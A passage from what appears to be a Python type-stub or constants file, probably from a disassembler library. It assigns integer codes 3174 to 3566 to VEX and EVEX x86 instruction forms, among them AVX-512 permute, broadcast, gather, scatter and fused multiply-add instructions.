EVEX_VPSHRDVD_XMM_K1Z_XMM_XMMM128B32: int = 3174
EVEX_VPSHRDVD_YMM_K1Z_YMM_YMMM256B32: int = 3175
EVEX_VPSHRDVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3176
EVEX_VPSHRDVQ_XMM_K1Z_XMM_XMMM128B64: int = 3177
EVEX_VPSHRDVQ_YMM_K1Z_YMM_YMMM256B64: int = 3178
EVEX_VPSHRDVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3179
EVEX_VPERMI2B_XMM_K1Z_XMM_XMMM128: int = 3180
EVEX_VPERMI2B_YMM_K1Z_YMM_YMMM256: int = 3181
EVEX_VPERMI2B_ZMM_K1Z_ZMM_ZMMM512: int = 3182
EVEX_VPERMI2W_XMM_K1Z_XMM_XMMM128: int = 3183
EVEX_VPERMI2W_YMM_K1Z_YMM_YMMM256: int = 3184
EVEX_VPERMI2W_ZMM_K1Z_ZMM_ZMMM512: int = 3185
EVEX_VPERMI2D_XMM_K1Z_XMM_XMMM128B32: int = 3186
EVEX_VPERMI2D_YMM_K1Z_YMM_YMMM256B32: int = 3187
EVEX_VPERMI2D_ZMM_K1Z_ZMM_ZMMM512B32: int = 3188
EVEX_VPERMI2Q_XMM_K1Z_XMM_XMMM128B64: int = 3189
EVEX_VPERMI2Q_YMM_K1Z_YMM_YMMM256B64: int = 3190
EVEX_VPERMI2Q_ZMM_K1Z_ZMM_ZMMM512B64: int = 3191
EVEX_VPERMI2PS_XMM_K1Z_XMM_XMMM128B32: int = 3192
EVEX_VPERMI2PS_YMM_K1Z_YMM_YMMM256B32: int = 3193
EVEX_VPERMI2PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3194
EVEX_VPERMI2PD_XMM_K1Z_XMM_XMMM128B64: int = 3195
EVEX_VPERMI2PD_YMM_K1Z_YMM_YMMM256B64: int = 3196
EVEX_VPERMI2PD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3197
VEX_VPBROADCASTB_XMM_XMMM8: int = 3198
VEX_VPBROADCASTB_YMM_XMMM8: int = 3199
EVEX_VPBROADCASTB_XMM_K1Z_XMMM8: int = 3200
EVEX_VPBROADCASTB_YMM_K1Z_XMMM8: int = 3201
EVEX_VPBROADCASTB_ZMM_K1Z_XMMM8: int = 3202
VEX_VPBROADCASTW_XMM_XMMM16: int = 3203
VEX_VPBROADCASTW_YMM_XMMM16: int = 3204
EVEX_VPBROADCASTW_XMM_K1Z_XMMM16: int = 3205
EVEX_VPBROADCASTW_YMM_K1Z_XMMM16: int = 3206
EVEX_VPBROADCASTW_ZMM_K1Z_XMMM16: int = 3207
EVEX_VPBROADCASTB_XMM_K1Z_R32: int = 3208
EVEX_VPBROADCASTB_YMM_K1Z_R32: int = 3209
EVEX_VPBROADCASTB_ZMM_K1Z_R32: int = 3210
EVEX_VPBROADCASTW_XMM_K1Z_R32: int = 3211
EVEX_VPBROADCASTW_YMM_K1Z_R32: int = 3212
EVEX_VPBROADCASTW_ZMM_K1Z_R32: int = 3213
EVEX_VPBROADCASTD_XMM_K1Z_R32: int = 3214
EVEX_VPBROADCASTD_YMM_K1Z_R32: int = 3215
EVEX_VPBROADCASTD_ZMM_K1Z_R32: int = 3216
EVEX_VPBROADCASTQ_XMM_K1Z_R64: int = 3217
EVEX_VPBROADCASTQ_YMM_K1Z_R64: int = 3218
EVEX_VPBROADCASTQ_ZMM_K1Z_R64: int = 3219
EVEX_VPERMT2B_XMM_K1Z_XMM_XMMM128: int = 3220
EVEX_VPERMT2B_YMM_K1Z_YMM_YMMM256: int = 3221
EVEX_VPERMT2B_ZMM_K1Z_ZMM_ZMMM512: int = 3222
EVEX_VPERMT2W_XMM_K1Z_XMM_XMMM128: int = 3223
EVEX_VPERMT2W_YMM_K1Z_YMM_YMMM256: int = 3224
EVEX_VPERMT2W_ZMM_K1Z_ZMM_ZMMM512: int = 3225
EVEX_VPERMT2D_XMM_K1Z_XMM_XMMM128B32: int = 3226
EVEX_VPERMT2D_YMM_K1Z_YMM_YMMM256B32: int = 3227
EVEX_VPERMT2D_ZMM_K1Z_ZMM_ZMMM512B32: int = 3228
EVEX_VPERMT2Q_XMM_K1Z_XMM_XMMM128B64: int = 3229
EVEX_VPERMT2Q_YMM_K1Z_YMM_YMMM256B64: int = 3230
EVEX_VPERMT2Q_ZMM_K1Z_ZMM_ZMMM512B64: int = 3231
EVEX_VPERMT2PS_XMM_K1Z_XMM_XMMM128B32: int = 3232
EVEX_VPERMT2PS_YMM_K1Z_YMM_YMMM256B32: int = 3233
EVEX_VPERMT2PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3234
EVEX_VPERMT2PD_XMM_K1Z_XMM_XMMM128B64: int = 3235
EVEX_VPERMT2PD_YMM_K1Z_YMM_YMMM256B64: int = 3236
EVEX_VPERMT2PD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3237
INVEPT_R32_M128: int = 3238
INVEPT_R64_M128: int = 3239
INVVPID_R32_M128: int = 3240
INVVPID_R64_M128: int = 3241
INVPCID_R32_M128: int = 3242
INVPCID_R64_M128: int = 3243
EVEX_VPMULTISHIFTQB_XMM_K1Z_XMM_XMMM128B64: int = 3244
EVEX_VPMULTISHIFTQB_YMM_K1Z_YMM_YMMM256B64: int = 3245
EVEX_VPMULTISHIFTQB_ZMM_K1Z_ZMM_ZMMM512B64: int = 3246
EVEX_VEXPANDPS_XMM_K1Z_XMMM128: int = 3247
EVEX_VEXPANDPS_YMM_K1Z_YMMM256: int = 3248
EVEX_VEXPANDPS_ZMM_K1Z_ZMMM512: int = 3249
EVEX_VEXPANDPD_XMM_K1Z_XMMM128: int = 3250
EVEX_VEXPANDPD_YMM_K1Z_YMMM256: int = 3251
EVEX_VEXPANDPD_ZMM_K1Z_ZMMM512: int = 3252
EVEX_VPEXPANDD_XMM_K1Z_XMMM128: int = 3253
EVEX_VPEXPANDD_YMM_K1Z_YMMM256: int = 3254
EVEX_VPEXPANDD_ZMM_K1Z_ZMMM512: int = 3255
EVEX_VPEXPANDQ_XMM_K1Z_XMMM128: int = 3256
EVEX_VPEXPANDQ_YMM_K1Z_YMMM256: int = 3257
EVEX_VPEXPANDQ_ZMM_K1Z_ZMMM512: int = 3258
EVEX_VCOMPRESSPS_XMMM128_K1Z_XMM: int = 3259
EVEX_VCOMPRESSPS_YMMM256_K1Z_YMM: int = 3260
EVEX_VCOMPRESSPS_ZMMM512_K1Z_ZMM: int = 3261
EVEX_VCOMPRESSPD_XMMM128_K1Z_XMM: int = 3262
EVEX_VCOMPRESSPD_YMMM256_K1Z_YMM: int = 3263
EVEX_VCOMPRESSPD_ZMMM512_K1Z_ZMM: int = 3264
EVEX_VPCOMPRESSD_XMMM128_K1Z_XMM: int = 3265
EVEX_VPCOMPRESSD_YMMM256_K1Z_YMM: int = 3266
EVEX_VPCOMPRESSD_ZMMM512_K1Z_ZMM: int = 3267
EVEX_VPCOMPRESSQ_XMMM128_K1Z_XMM: int = 3268
EVEX_VPCOMPRESSQ_YMMM256_K1Z_YMM: int = 3269
EVEX_VPCOMPRESSQ_ZMMM512_K1Z_ZMM: int = 3270
VEX_VPMASKMOVD_XMM_XMM_M128: int = 3271
VEX_VPMASKMOVD_YMM_YMM_M256: int = 3272
VEX_VPMASKMOVQ_XMM_XMM_M128: int = 3273
VEX_VPMASKMOVQ_YMM_YMM_M256: int = 3274
EVEX_VPERMB_XMM_K1Z_XMM_XMMM128: int = 3275
EVEX_VPERMB_YMM_K1Z_YMM_YMMM256: int = 3276
EVEX_VPERMB_ZMM_K1Z_ZMM_ZMMM512: int = 3277
EVEX_VPERMW_XMM_K1Z_XMM_XMMM128: int = 3278
EVEX_VPERMW_YMM_K1Z_YMM_YMMM256: int = 3279
EVEX_VPERMW_ZMM_K1Z_ZMM_ZMMM512: int = 3280
VEX_VPMASKMOVD_M128_XMM_XMM: int = 3281
VEX_VPMASKMOVD_M256_YMM_YMM: int = 3282
VEX_VPMASKMOVQ_M128_XMM_XMM: int = 3283
VEX_VPMASKMOVQ_M256_YMM_YMM: int = 3284
EVEX_VPSHUFBITQMB_KR_K1_XMM_XMMM128: int = 3285
EVEX_VPSHUFBITQMB_KR_K1_YMM_YMMM256: int = 3286
EVEX_VPSHUFBITQMB_KR_K1_ZMM_ZMMM512: int = 3287
VEX_VPGATHERDD_XMM_VM32X_XMM: int = 3288
VEX_VPGATHERDD_YMM_VM32Y_YMM: int = 3289
VEX_VPGATHERDQ_XMM_VM32X_XMM: int = 3290
VEX_VPGATHERDQ_YMM_VM32X_YMM: int = 3291
EVEX_VPGATHERDD_XMM_K1_VM32X: int = 3292
EVEX_VPGATHERDD_YMM_K1_VM32Y: int = 3293
EVEX_VPGATHERDD_ZMM_K1_VM32Z: int = 3294
EVEX_VPGATHERDQ_XMM_K1_VM32X: int = 3295
EVEX_VPGATHERDQ_YMM_K1_VM32X: int = 3296
EVEX_VPGATHERDQ_ZMM_K1_VM32Y: int = 3297
VEX_VPGATHERQD_XMM_VM64X_XMM: int = 3298
VEX_VPGATHERQD_XMM_VM64Y_XMM: int = 3299
VEX_VPGATHERQQ_XMM_VM64X_XMM: int = 3300
VEX_VPGATHERQQ_YMM_VM64Y_YMM: int = 3301
EVEX_VPGATHERQD_XMM_K1_VM64X: int = 3302
EVEX_VPGATHERQD_XMM_K1_VM64Y: int = 3303
EVEX_VPGATHERQD_YMM_K1_VM64Z: int = 3304
EVEX_VPGATHERQQ_XMM_K1_VM64X: int = 3305
EVEX_VPGATHERQQ_YMM_K1_VM64Y: int = 3306
EVEX_VPGATHERQQ_ZMM_K1_VM64Z: int = 3307
VEX_VGATHERDPS_XMM_VM32X_XMM: int = 3308
VEX_VGATHERDPS_YMM_VM32Y_YMM: int = 3309
VEX_VGATHERDPD_XMM_VM32X_XMM: int = 3310
VEX_VGATHERDPD_YMM_VM32X_YMM: int = 3311
EVEX_VGATHERDPS_XMM_K1_VM32X: int = 3312
EVEX_VGATHERDPS_YMM_K1_VM32Y: int = 3313
EVEX_VGATHERDPS_ZMM_K1_VM32Z: int = 3314
EVEX_VGATHERDPD_XMM_K1_VM32X: int = 3315
EVEX_VGATHERDPD_YMM_K1_VM32X: int = 3316
EVEX_VGATHERDPD_ZMM_K1_VM32Y: int = 3317
VEX_VGATHERQPS_XMM_VM64X_XMM: int = 3318
VEX_VGATHERQPS_XMM_VM64Y_XMM: int = 3319
VEX_VGATHERQPD_XMM_VM64X_XMM: int = 3320
VEX_VGATHERQPD_YMM_VM64Y_YMM: int = 3321
EVEX_VGATHERQPS_XMM_K1_VM64X: int = 3322
EVEX_VGATHERQPS_XMM_K1_VM64Y: int = 3323
EVEX_VGATHERQPS_YMM_K1_VM64Z: int = 3324
EVEX_VGATHERQPD_XMM_K1_VM64X: int = 3325
EVEX_VGATHERQPD_YMM_K1_VM64Y: int = 3326
EVEX_VGATHERQPD_ZMM_K1_VM64Z: int = 3327
VEX_VFMADDSUB132PS_XMM_XMM_XMMM128: int = 3328
VEX_VFMADDSUB132PS_YMM_YMM_YMMM256: int = 3329
VEX_VFMADDSUB132PD_XMM_XMM_XMMM128: int = 3330
VEX_VFMADDSUB132PD_YMM_YMM_YMMM256: int = 3331
EVEX_VFMADDSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3332
EVEX_VFMADDSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3333
EVEX_VFMADDSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3334
EVEX_VFMADDSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3335
EVEX_VFMADDSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3336
EVEX_VFMADDSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3337
VEX_VFMSUBADD132PS_XMM_XMM_XMMM128: int = 3338
VEX_VFMSUBADD132PS_YMM_YMM_YMMM256: int = 3339
VEX_VFMSUBADD132PD_XMM_XMM_XMMM128: int = 3340
VEX_VFMSUBADD132PD_YMM_YMM_YMMM256: int = 3341
EVEX_VFMSUBADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3342
EVEX_VFMSUBADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3343
EVEX_VFMSUBADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3344
EVEX_VFMSUBADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3345
EVEX_VFMSUBADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3346
EVEX_VFMSUBADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3347
VEX_VFMADD132PS_XMM_XMM_XMMM128: int = 3348
VEX_VFMADD132PS_YMM_YMM_YMMM256: int = 3349
VEX_VFMADD132PD_XMM_XMM_XMMM128: int = 3350
VEX_VFMADD132PD_YMM_YMM_YMMM256: int = 3351
EVEX_VFMADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3352
EVEX_VFMADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3353
EVEX_VFMADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3354
EVEX_VFMADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3355
EVEX_VFMADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3356
EVEX_VFMADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3357
VEX_VFMADD132SS_XMM_XMM_XMMM32: int = 3358
VEX_VFMADD132SD_XMM_XMM_XMMM64: int = 3359
EVEX_VFMADD132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3360
EVEX_VFMADD132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3361
VEX_VFMSUB132PS_XMM_XMM_XMMM128: int = 3362
VEX_VFMSUB132PS_YMM_YMM_YMMM256: int = 3363
VEX_VFMSUB132PD_XMM_XMM_XMMM128: int = 3364
VEX_VFMSUB132PD_YMM_YMM_YMMM256: int = 3365
EVEX_VFMSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3366
EVEX_VFMSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3367
EVEX_VFMSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3368
EVEX_VFMSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3369
EVEX_VFMSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3370
EVEX_VFMSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3371
EVEX_V4FMADDPS_ZMM_K1Z_ZMMP3_M128: int = 3372
VEX_VFMSUB132SS_XMM_XMM_XMMM32: int = 3373
VEX_VFMSUB132SD_XMM_XMM_XMMM64: int = 3374
EVEX_VFMSUB132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3375
EVEX_VFMSUB132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3376
EVEX_V4FMADDSS_XMM_K1Z_XMMP3_M128: int = 3377
VEX_VFNMADD132PS_XMM_XMM_XMMM128: int = 3378
VEX_VFNMADD132PS_YMM_YMM_YMMM256: int = 3379
VEX_VFNMADD132PD_XMM_XMM_XMMM128: int = 3380
VEX_VFNMADD132PD_YMM_YMM_YMMM256: int = 3381
EVEX_VFNMADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3382
EVEX_VFNMADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3383
EVEX_VFNMADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3384
EVEX_VFNMADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3385
EVEX_VFNMADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3386
EVEX_VFNMADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3387
VEX_VFNMADD132SS_XMM_XMM_XMMM32: int = 3388
VEX_VFNMADD132SD_XMM_XMM_XMMM64: int = 3389
EVEX_VFNMADD132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3390
EVEX_VFNMADD132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3391
VEX_VFNMSUB132PS_XMM_XMM_XMMM128: int = 3392
VEX_VFNMSUB132PS_YMM_YMM_YMMM256: int = 3393
VEX_VFNMSUB132PD_XMM_XMM_XMMM128: int = 3394
VEX_VFNMSUB132PD_YMM_YMM_YMMM256: int = 3395
EVEX_VFNMSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3396
EVEX_VFNMSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3397
EVEX_VFNMSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3398
EVEX_VFNMSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3399
EVEX_VFNMSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3400
EVEX_VFNMSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3401
VEX_VFNMSUB132SS_XMM_XMM_XMMM32: int = 3402
VEX_VFNMSUB132SD_XMM_XMM_XMMM64: int = 3403
EVEX_VFNMSUB132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3404
EVEX_VFNMSUB132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3405
EVEX_VPSCATTERDD_VM32X_K1_XMM: int = 3406
EVEX_VPSCATTERDD_VM32Y_K1_YMM: int = 3407
EVEX_VPSCATTERDD_VM32Z_K1_ZMM: int = 3408
EVEX_VPSCATTERDQ_VM32X_K1_XMM: int = 3409
EVEX_VPSCATTERDQ_VM32X_K1_YMM: int = 3410
EVEX_VPSCATTERDQ_VM32Y_K1_ZMM: int = 3411
EVEX_VPSCATTERQD_VM64X_K1_XMM: int = 3412
EVEX_VPSCATTERQD_VM64Y_K1_XMM: int = 3413
EVEX_VPSCATTERQD_VM64Z_K1_YMM: int = 3414
EVEX_VPSCATTERQQ_VM64X_K1_XMM: int = 3415
EVEX_VPSCATTERQQ_VM64Y_K1_YMM: int = 3416
EVEX_VPSCATTERQQ_VM64Z_K1_ZMM: int = 3417
EVEX_VSCATTERDPS_VM32X_K1_XMM: int = 3418
EVEX_VSCATTERDPS_VM32Y_K1_YMM: int = 3419
EVEX_VSCATTERDPS_VM32Z_K1_ZMM: int = 3420
EVEX_VSCATTERDPD_VM32X_K1_XMM: int = 3421
EVEX_VSCATTERDPD_VM32X_K1_YMM: int = 3422
EVEX_VSCATTERDPD_VM32Y_K1_ZMM: int = 3423
EVEX_VSCATTERQPS_VM64X_K1_XMM: int = 3424
EVEX_VSCATTERQPS_VM64Y_K1_XMM: int = 3425
EVEX_VSCATTERQPS_VM64Z_K1_YMM: int = 3426
EVEX_VSCATTERQPD_VM64X_K1_XMM: int = 3427
EVEX_VSCATTERQPD_VM64Y_K1_YMM: int = 3428
EVEX_VSCATTERQPD_VM64Z_K1_ZMM: int = 3429
VEX_VFMADDSUB213PS_XMM_XMM_XMMM128: int = 3430
VEX_VFMADDSUB213PS_YMM_YMM_YMMM256: int = 3431
VEX_VFMADDSUB213PD_XMM_XMM_XMMM128: int = 3432
VEX_VFMADDSUB213PD_YMM_YMM_YMMM256: int = 3433
EVEX_VFMADDSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3434
EVEX_VFMADDSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3435
EVEX_VFMADDSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3436
EVEX_VFMADDSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3437
EVEX_VFMADDSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3438
EVEX_VFMADDSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3439
VEX_VFMSUBADD213PS_XMM_XMM_XMMM128: int = 3440
VEX_VFMSUBADD213PS_YMM_YMM_YMMM256: int = 3441
VEX_VFMSUBADD213PD_XMM_XMM_XMMM128: int = 3442
VEX_VFMSUBADD213PD_YMM_YMM_YMMM256: int = 3443
EVEX_VFMSUBADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3444
EVEX_VFMSUBADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3445
EVEX_VFMSUBADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3446
EVEX_VFMSUBADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3447
EVEX_VFMSUBADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3448
EVEX_VFMSUBADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3449
VEX_VFMADD213PS_XMM_XMM_XMMM128: int = 3450
VEX_VFMADD213PS_YMM_YMM_YMMM256: int = 3451
VEX_VFMADD213PD_XMM_XMM_XMMM128: int = 3452
VEX_VFMADD213PD_YMM_YMM_YMMM256: int = 3453
EVEX_VFMADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3454
EVEX_VFMADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3455
EVEX_VFMADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3456
EVEX_VFMADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3457
EVEX_VFMADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3458
EVEX_VFMADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3459
VEX_VFMADD213SS_XMM_XMM_XMMM32: int = 3460
VEX_VFMADD213SD_XMM_XMM_XMMM64: int = 3461
EVEX_VFMADD213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3462
EVEX_VFMADD213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3463
VEX_VFMSUB213PS_XMM_XMM_XMMM128: int = 3464
VEX_VFMSUB213PS_YMM_YMM_YMMM256: int = 3465
VEX_VFMSUB213PD_XMM_XMM_XMMM128: int = 3466
VEX_VFMSUB213PD_YMM_YMM_YMMM256: int = 3467
EVEX_VFMSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3468
EVEX_VFMSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3469
EVEX_VFMSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3470
EVEX_VFMSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3471
EVEX_VFMSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3472
EVEX_VFMSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3473
EVEX_V4FNMADDPS_ZMM_K1Z_ZMMP3_M128: int = 3474
VEX_VFMSUB213SS_XMM_XMM_XMMM32: int = 3475
VEX_VFMSUB213SD_XMM_XMM_XMMM64: int = 3476
EVEX_VFMSUB213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3477
EVEX_VFMSUB213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3478
EVEX_V4FNMADDSS_XMM_K1Z_XMMP3_M128: int = 3479
VEX_VFNMADD213PS_XMM_XMM_XMMM128: int = 3480
VEX_VFNMADD213PS_YMM_YMM_YMMM256: int = 3481
VEX_VFNMADD213PD_XMM_XMM_XMMM128: int = 3482
VEX_VFNMADD213PD_YMM_YMM_YMMM256: int = 3483
EVEX_VFNMADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3484
EVEX_VFNMADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3485
EVEX_VFNMADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3486
EVEX_VFNMADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3487
EVEX_VFNMADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3488
EVEX_VFNMADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3489
VEX_VFNMADD213SS_XMM_XMM_XMMM32: int = 3490
VEX_VFNMADD213SD_XMM_XMM_XMMM64: int = 3491
EVEX_VFNMADD213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3492
EVEX_VFNMADD213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3493
VEX_VFNMSUB213PS_XMM_XMM_XMMM128: int = 3494
VEX_VFNMSUB213PS_YMM_YMM_YMMM256: int = 3495
VEX_VFNMSUB213PD_XMM_XMM_XMMM128: int = 3496
VEX_VFNMSUB213PD_YMM_YMM_YMMM256: int = 3497
EVEX_VFNMSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3498
EVEX_VFNMSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3499
EVEX_VFNMSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3500
EVEX_VFNMSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3501
EVEX_VFNMSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3502
EVEX_VFNMSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3503
VEX_VFNMSUB213SS_XMM_XMM_XMMM32: int = 3504
VEX_VFNMSUB213SD_XMM_XMM_XMMM64: int = 3505
EVEX_VFNMSUB213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3506
EVEX_VFNMSUB213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3507
EVEX_VPMADD52LUQ_XMM_K1Z_XMM_XMMM128B64: int = 3508
EVEX_VPMADD52LUQ_YMM_K1Z_YMM_YMMM256B64: int = 3509
EVEX_VPMADD52LUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3510
EVEX_VPMADD52HUQ_XMM_K1Z_XMM_XMMM128B64: int = 3511
EVEX_VPMADD52HUQ_YMM_K1Z_YMM_YMMM256B64: int = 3512
EVEX_VPMADD52HUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3513
VEX_VFMADDSUB231PS_XMM_XMM_XMMM128: int = 3514
VEX_VFMADDSUB231PS_YMM_YMM_YMMM256: int = 3515
VEX_VFMADDSUB231PD_XMM_XMM_XMMM128: int = 3516
VEX_VFMADDSUB231PD_YMM_YMM_YMMM256: int = 3517
EVEX_VFMADDSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3518
EVEX_VFMADDSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3519
EVEX_VFMADDSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3520
EVEX_VFMADDSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3521
EVEX_VFMADDSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3522
EVEX_VFMADDSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3523
VEX_VFMSUBADD231PS_XMM_XMM_XMMM128: int = 3524
VEX_VFMSUBADD231PS_YMM_YMM_YMMM256: int = 3525
VEX_VFMSUBADD231PD_XMM_XMM_XMMM128: int = 3526
VEX_VFMSUBADD231PD_YMM_YMM_YMMM256: int = 3527
EVEX_VFMSUBADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3528
EVEX_VFMSUBADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3529
EVEX_VFMSUBADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3530
EVEX_VFMSUBADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3531
EVEX_VFMSUBADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3532
EVEX_VFMSUBADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3533
VEX_VFMADD231PS_XMM_XMM_XMMM128: int = 3534
VEX_VFMADD231PS_YMM_YMM_YMMM256: int = 3535
VEX_VFMADD231PD_XMM_XMM_XMMM128: int = 3536
VEX_VFMADD231PD_YMM_YMM_YMMM256: int = 3537
EVEX_VFMADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3538
EVEX_VFMADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3539
EVEX_VFMADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3540
EVEX_VFMADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3541
EVEX_VFMADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3542
EVEX_VFMADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3543
VEX_VFMADD231SS_XMM_XMM_XMMM32: int = 3544
VEX_VFMADD231SD_XMM_XMM_XMMM64: int = 3545
EVEX_VFMADD231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3546
EVEX_VFMADD231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3547
VEX_VFMSUB231PS_XMM_XMM_XMMM128: int = 3548
VEX_VFMSUB231PS_YMM_YMM_YMMM256: int = 3549
VEX_VFMSUB231PD_XMM_XMM_XMMM128: int = 3550
VEX_VFMSUB231PD_YMM_YMM_YMMM256: int = 3551
EVEX_VFMSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3552
EVEX_VFMSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3553
EVEX_VFMSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3554
EVEX_VFMSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3555
EVEX_VFMSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3556
EVEX_VFMSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3557
VEX_VFMSUB231SS_XMM_XMM_XMMM32: int = 3558
VEX_VFMSUB231SD_XMM_XMM_XMMM64: int = 3559
EVEX_VFMSUB231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3560
EVEX_VFMSUB231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3561
VEX_VFNMADD231PS_XMM_XMM_XMMM128: int = 3562
VEX_VFNMADD231PS_YMM_YMM_YMMM256: int = 3563
VEX_VFNMADD231PD_XMM_XMM_XMMM128: int = 3564
VEX_VFNMADD231PD_YMM_YMM_YMMM256: int = 3565
EVEX_VFNMADD231PS_XMM_K1Z_XMM_XMMM128B32: int = 3566
